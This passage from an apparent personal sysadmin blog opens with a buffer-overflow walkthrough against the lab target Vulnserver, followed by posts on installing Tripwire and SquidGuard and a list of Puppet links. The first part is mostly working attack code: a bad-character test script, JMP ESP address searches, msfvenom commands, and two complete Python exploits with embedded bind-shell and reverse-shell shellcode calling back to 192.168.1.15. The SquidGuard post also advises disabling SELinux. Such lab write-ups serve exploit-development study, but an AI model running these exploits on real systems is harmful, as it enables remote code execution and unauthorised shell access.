Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk6Gk7Gk8Gk9Gl0Gl1Gl2Gl3Gl4Gl5Gl6Gl7Gl8Gl9Gm0Gm1Gm2G

3. After we determine the offset we have to determine the bad characters in our case the \x00

We use this script below to determine a bad char:
#!/usr/bin/python
import socket
server = '192.168.1.26'
sport = 9999

prefix = 'A' * 2006
eip = 'BCDE'
testchars = ''
for i in range(0, 256):
testchars += chr(i)
padding = 'F' * (3000 - 2006 - 4 - len(testchars))
attack = prefix + eip + testchars + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
print "Sending attack to TRUN . with length ", len(attack)
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)

s.close()

When we tests with the  \x00 we get an access violation at 45444342 the last that we get written is BCDE - so \x00 is a bad char.








To skip \x00 we change the range of characters to (1,256). I saw that after skipping the bad char there were chars going to the stack. 
















4. We will need to jump to an ESP register where we can inject our exploitation code.

For XP I used findjmp to find a ESP that is directly to KERNEL32.DLL:
https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin

Both USER32 and KERNEL32 are usable:
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp

#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0      call esp
#0x7C86467B      jmp esp
#0x7C868667      call esp <- will use this one
#Finished Scanning KERNEL32 for code useable with the esp register

For Windows 7 I used mona to find an ESP in essfunc.dll since it is not  ASLR protected:
!mona find -s "\xff\xe4" -m essfunc.dll











5. The payload:

For Windows XP I used a bind shell, this did not work on Windows 7:
#/usr/share/framework2
./msfpayload win32_bind LPORT=1313 R | ./msfencode -b "\x00"

For Windows 7 I determined that the working variant was a reverse shell with msfvenom: 

#msfvenom -p windows/shell_reverse_tcp LHOST="192.168.1.15" LPORT=4444 -f c -a x86 -b '\x00' 


Exploit for Vulnserver on  Windows XP:
import socket

#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))

SER_ADDR = '192.168.1.27'
SER_PORT = 9999

my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')

data = my_sock.recv(1024)
#Possible Registers for usage on XP SP3
#https://github.com/nickvido/littleoldearthquake/tree/master/corelan/findjmp/findjmp/bin
#findjmp KERNEL32.DLL esp
#findjmp USER32.DLL esp
#Scanning KERNEL32 for code useable with the esp register
#0x7C8369F0      call esp
#0x7C86467B      jmp esp
#0x7C868667      call esp <- will use this one
#Finished Scanning KERNEL32 for code useable with the esp register
message = '\x41' * 2006 + '\x67\x86\x86\x7c' #CALL ESP that we chose
message += '\x90' * 16

#/usr/share/framework2
#./msfpayload win32_bind LPORT=1313 R | ./msfencode -b "\x00"
message +=(
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xef\x4d\x96"
"\x95\x83\xeb\xfc\xe2\xf4\x13\x27\x7d\xd8\x07\xb4\x69\x6a\x10\x2d"
"\x1d\xf9\xcb\x69\x1d\xd0\xd3\xc6\xea\x90\x97\x4c\x79\x1e\xa0\x55"
"\x1d\xca\xcf\x4c\x7d\xdc\x64\x79\x1d\x94\x01\x7c\x56\x0c\x43\xc9"
"\x56\xe1\xe8\x8c\x5c\x98\xee\x8f\x7d\x61\xd4\x19\xb2\xbd\x9a\xa8"
"\x1d\xca\xcb\x4c\x7d\xf3\x64\x41\xdd\x1e\xb0\x51\x97\x7e\xec\x61"
"\x1d\x1c\x83\x69\x8a\xf4\x2c\x7c\x4d\xf1\x64\x0e\xa6\x1e\xaf\x41"
"\x1d\xe5\xf3\xe0\x1d\xd5\xe7\x13\xfe\x1b\xa1\x43\x7a\xc5\x10\x9b"
"\xf0\xc6\x89\x25\xa5\xa7\x87\x3a\xe5\xa7\xb0\x19\x69\x45\x87\x86"
"\x7b\x69\xd4\x1d\x69\x43\xb0\xc4\x73\xf3\x6e\xa0\x9e\x97\xba\x27"
"\x94\x6a\x3f\x25\x4f\x9c\x1a\xe0\xc1\x6a\x39\x1e\xc5\xc6\xbc\x1e"
"\xd5\xc6\xac\x1e\x69\x45\x89\x25\x93\xb4\x89\x1e\x1f\x74\x7a\x25"
"\x32\x8f\x9f\x8a\xc1\x6a\x39\x27\x86\xc4\xba\xb2\x46\xfd\x4b\xe0"
"\xb8\x7c\xb8\xb2\x40\xc6\xba\xb2\x46\xfd\x0a\x04\x10\xdc\xb8\xb2"
"\x40\xc5\xbb\x19\xc3\x6a\x3f\xde\xfe\x72\x96\x8b\xef\xc2\x10\x9b"
"\xc3\x6a\x3f\x2b\xfc\xf1\x89\x25\xf5\xf8\x66\xa8\xfc\xc5\xb6\x64"
"\x5a\x1c\x08\x27\xd2\x1c\x0d\x7c\x56\x66\x45\xb3\xd4\xb8\x11\x0f"
"\xba\x06\x62\x37\xae\x3e\x44\xe6\xfe\xe7\x11\xfe\x80\x6a\x9a\x09"
"\x69\x43\xb4\x1a\xc4\xc4\xbe\x1c\xfc\x94\xbe\x1c\xc3\xc4\x10\x9d"
"\xfe\x38\x36\x48\x58\xc6\x10\x9b\xfc\x6a\x10\x7a\x69\x45\x64\x1a"
"\x6a\x16\x2b\x29\x69\x43\xbd\xb2\x46\xfd\x1f\xc7\x92\xca\xbc\xb2"
"\x40\x6a\x3f\x4d\x96\x95")

my_sock.send(('TRUN .' + message + '\r\n'))

print my_sock.recv(1024)
my_sock.send('EXIT\r\n')
print my_sock.recv(1024)
my_sock.close()

Exploit for  Vulnserver on Windows 7:
import socket

#SER_ADDR = input('Type the server IP address: ')
#SER_PORT = int(input('Type the server port: '))

SER_ADDR = '192.168.1.26'
SER_PORT = 9999

my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.connect((SER_ADDR, SER_PORT))
print('Connection established')

data = my_sock.recv(1024)

prefix = '\x41' * 2006
esp = '\xaf\x11\x50\x62' #CALL ESP that we chose
nopsled = '\x90' * 16

#!mona find -s "\xff\xe4" -m essfunc.dll
#msfvenom -p windows/shell_reverse_tcp LHOST="192.168.1.15" LPORT=4444 -f c -a x86 -b '\x00' <-works
payload =(
"\xdd\xc5\xd9\x74\x24\xf4\xb8\x84\x6e\x28\xf3\x5a\x33\xc9\xb1"
"\x52\x31\x42\x17\x03\x42\x17\x83\x46\x6a\xca\x06\xba\x9b\x88"
"\xe9\x42\x5c\xed\x60\xa7\x6d\x2d\x16\xac\xde\x9d\x5c\xe0\xd2"
"\x56\x30\x10\x60\x1a\x9d\x17\xc1\x91\xfb\x16\xd2\x8a\x38\x39"
"\x50\xd1\x6c\x99\x69\x1a\x61\xd8\xae\x47\x88\x88\x67\x03\x3f"
"\x3c\x03\x59\xfc\xb7\x5f\x4f\x84\x24\x17\x6e\xa5\xfb\x23\x29"
"\x65\xfa\xe0\x41\x2c\xe4\xe5\x6c\xe6\x9f\xde\x1b\xf9\x49\x2f"
"\xe3\x56\xb4\x9f\x16\xa6\xf1\x18\xc9\xdd\x0b\x5b\x74\xe6\xc8"
"\x21\xa2\x63\xca\x82\x21\xd3\x36\x32\xe5\x82\xbd\x38\x42\xc0"
"\x99\x5c\x55\x05\x92\x59\xde\xa8\x74\xe8\xa4\x8e\x50\xb0\x7f"
"\xae\xc1\x1c\xd1\xcf\x11\xff\x8e\x75\x5a\x12\xda\x07\x01\x7b"
"\x2f\x2a\xb9\x7b\x27\x3d\xca\x49\xe8\x95\x44\xe2\x61\x30\x93"
"\x05\x58\x84\x0b\xf8\x63\xf5\x02\x3f\x37\xa5\x3c\x96\x38\x2e"
"\xbc\x17\xed\xe1\xec\xb7\x5e\x42\x5c\x78\x0f\x2a\xb6\x77\x70"
"\x4a\xb9\x5d\x19\xe1\x40\x36\xe6\x5e\x4b\xc9\x8e\x9c\x4b\xc4"
"\x12\x28\xad\x8c\xba\x7c\x66\x39\x22\x25\xfc\xd8\xab\xf3\x79"
"\xda\x20\xf0\x7e\x95\xc0\x7d\x6c\x42\x21\xc8\xce\xc5\x3e\xe6"
"\x66\x89\xad\x6d\x76\xc4\xcd\x39\x21\x81\x20\x30\xa7\x3f\x1a"
"\xea\xd5\xbd\xfa\xd5\x5d\x1a\x3f\xdb\x5c\xef\x7b\xff\x4e\x29"
"\x83\xbb\x3a\xe5\xd2\x15\x94\x43\x8d\xd7\x4e\x1a\x62\xbe\x06"
"\xdb\x48\x01\x50\xe4\x84\xf7\xbc\x55\x71\x4e\xc3\x5a\x15\x46"
"\xbc\x86\x85\xa9\x17\x03\xb5\xe3\x35\x22\x5e\xaa\xac\x76\x03"
"\x4d\x1b\xb4\x3a\xce\xa9\x45\xb9\xce\xd8\x40\x85\x48\x31\x39"
"\x96\x3c\x35\xee\x97\x14"
)

message = prefix + esp + nopsled + payload + 'C' * (3000-len(prefix)-len(esp)-len(nopsled)-len(payload))
my_sock.send(('TRUN .' + message + '\r\n'))

print my_sock.recv(1024)
my_sock.send('EXIT\r\n')
print my_sock.recv(1024)
my_sock.close()

Friday 27 April 2018

Installing Tripwire on Suse

First we have to get tripwire:

In my case:
zypper addrepo http://download.opensuse.org/repositories/security/SLE_12_SP2/security.repo
zypper refresh
zypper install tripwire
twadmin --generate-keys --local-keyfile /etc/tripwire/$HOSTNAME-local.key
twadmin --create-cfgfile -S /etc/tripwire/site.key /etc/tripwire/twcfg.txt

In /etc:
cp twcfg.txt tw.cfg
cp twpol.txt te.pol

Create twpol.txt if it does not exist:
# Begin twpol.txt

(
  rulename = "Tripwire Data Files",
  severity = 100
)
{
  /var/lib/tripwire                    -> $(Dynamic) -i ;
  /var/lib/tripwire/report             -> $(Dynamic) (recurse=0) ;
}

(
  rulename = "Root & Home",
  severity = 100
)
{
  /                                    -> $(IgnoreAll) (recurse=1) ;
  /home                                -> $(IgnoreAll) (recurse=1) ;
}

(
  rulename = "System Directories",
  severity = 100
)
{
  /bin                                 -> $(IgnoreNone)-SHa ;
  /boot                                -> $(IgnoreNone)-SHa ;
  /etc                                 -> $(IgnoreNone)-SHa ;
  /lib                                 -> $(IgnoreNone)-SHa ;
  /opt                                 -> $(IgnoreNone)-SHa ;
  /root                                -> $(IgnoreNone)-SHa ;
  /sbin                                -> $(IgnoreNone)-SHa ;
  /usr                                 -> $(IgnoreNone)-SHa ;
}

# End twpol.txt

twadmin --create-polfile -S site.key /etc/tripwire/twpol.txt
tripwire --init

tripwire --check
tripwire --check --interactive

References:

Thursday 19 April 2018

Installing SquidGuard on CentOS 7.x

Get Berkeley DB 4.6.21:
wget http://download.oracle.com/berkeley-db/db-4.6.21.tar.gz

cd db-46..
cd build_unix
../dist/configure 
make
make install

ln -s /usr/local/BerkeleyDB.4.6 /usr/local/BerkeleyDB


export LD_RUN_PATH=/usr/local/BerkeleyDB/lib ./configure
./configure
make
make install

Get the blacklist form here:
http://www.shalla.de/service.html

Create static lists to squidGuard db: 
ln -s /opt/3rdparty/BL/anonvpn /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/hacking /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/dating /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/gamble /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/movies /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/music /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/porn /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/sex /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/spyware /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/tracker /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/urlshortener /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/violence /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/warez /usr/local/squidGuard/db
ln -s /opt/3rdparty/BL/weapons /usr/local/squidGuard/db

SquidGuard configuration:
dbhome /usr/local/squidGuard/db
logdir /usr/local/squidGuard/log

dest anonvpn{
         log             anonvpn
         domainlist      anonvpn/domains
         urllist         anonvpn/urls
 }

dest hacking{
         log             hacking
         domainlist      hacking/domains
         urllist         hacking/urls
 }

dest dating{
         log             dating
         domainlist      dating/domains
         urllist         dating/urls
 }


dest gamble{
         log             gamble
         domainlist      gamble/domains
         urllist         gamble/urls
 }

dest movies{
         log             movies
         domainlist      movies/domains
         urllist         movies/urls
 }

dest music{
         log             music
         domainlist      music/domains
         urllist         music/urls
 }

dest porn{
         log             porn
         domainlist      porn/domains
         urllist         porn/urls
 }



dest spyware{
         log             spyware
         domainlist      spyware/domains
         urllist         spyware/urls
 }

dest tracker{
         log             tracker
         domainlist      tracker/domains
         urllist         tracker/urls
 }

dest urlshortener{
         log             urlshortener
         domainlist      urlshortener/domains
         urllist         urlshortener/urls
 }

dest violence{
         log             violence
         domainlist      violence/domains
         urllist         violence/urls
 }

dest warez{
         log             warez
         domainlist      warez/domains
         urllist         warez/urls
 }

dest weapons{
         log             weapons
         domainlist      weapons/domains
         urllist         weapons/urls
 }


acl {
  default {
   pass !anonvpn !hacking !dating !gamble !movies !music !porn !spyware !tracker !urlshortener !violence !warez !weapons all
   redirect 302:http://www.google.com
  }
 }



Switch of SELinux /etc/sysconfig/selinux, enter:
# vi /etc/sysconfig/selinux

And set / update it as follows:
SELINUX=disabled

chkconfig squid on

You will have to compile the lists in order for squidGuard to work with them. Removing and compiling stuff from the DB:
cd /usr/local/squidGuard/db
grep -r "example.com"
/usr/local/bin/
./squidGuard -C movies/domains
service squid restart

In Squid config:
# Try connecting to first 25 ips of domain name
forward_max_tries 25
#squidGuard
redirect_program /usr/local/bin/squidGuard -c /usr/local/squidGuard/squidGuard.conf
url_rewrite_bypass off
url_rewrite_program /usr/local/bin/squidGuard -c /usr/local/squidGuard/squidGuard.conf
#debug_options ALL,1 29,1


Wednesday 18 April 2018

Puppet Picks

Some great puppet picks if you want to use Puppet or write modules to it or install Foreman.

Modules:
https://forge.puppet.com/ghoneycutt?utf-8=%E2%9C%93&sort=&page=3
https://forge.puppet.com/saz/rsyslog
https://forge.puppet.com/puppetlabs/firewall
https://forge.puppet.com/razorsedge/network
https://www.youtube.com/channel/UC_BpuLm5IvV2tme4WSHEdgw
https://wiki.infn.it/progetti/cloud-areapd/best_practices/config_puppetrun

Writing modules:
http://www.bogotobogo.com/DevOps/Puppet/puppet_locking_user_accounts_deploying_sudoers_file.php
https://www.linode.com/docs/applications/puppet/create-puppet-module
https://www.linode.com/docs/applications/puppet/install-and-configure-puppet

Installation:
http://prolinuxhub.com/install-forman-on-centos-7/
http://www.linuxtechi.com/install-and-configure-foreman-on-centos-7-x/
http://www.itzgeek.com/how-tos/linux/ubuntu-how-tos/install-foreman-on-centos-7-rhel-7-ubuntu-14-04-3.html
http://www.ehowstuff.com/disable-ipv6-on-redhat-centos-6-centos-7/
https://www.linode.com/docs/applications/puppet/install-and-configure-puppet
https://ask.puppet.com/question/2451/how-do-you-change-the-runinterval/
https://linuxconfig.org/puppet-agent-exiting-no-certificate-found-and-waitforcert-is-disabled-solution
http://devopspy.com/devops/install-puppet-master-agent-on-centos-7/
http://opensourceforu.com/2011/01/data-centre-automation-puppet-resources-types-examples/
https://docs.puppet.com/puppet/latest/install_linux.html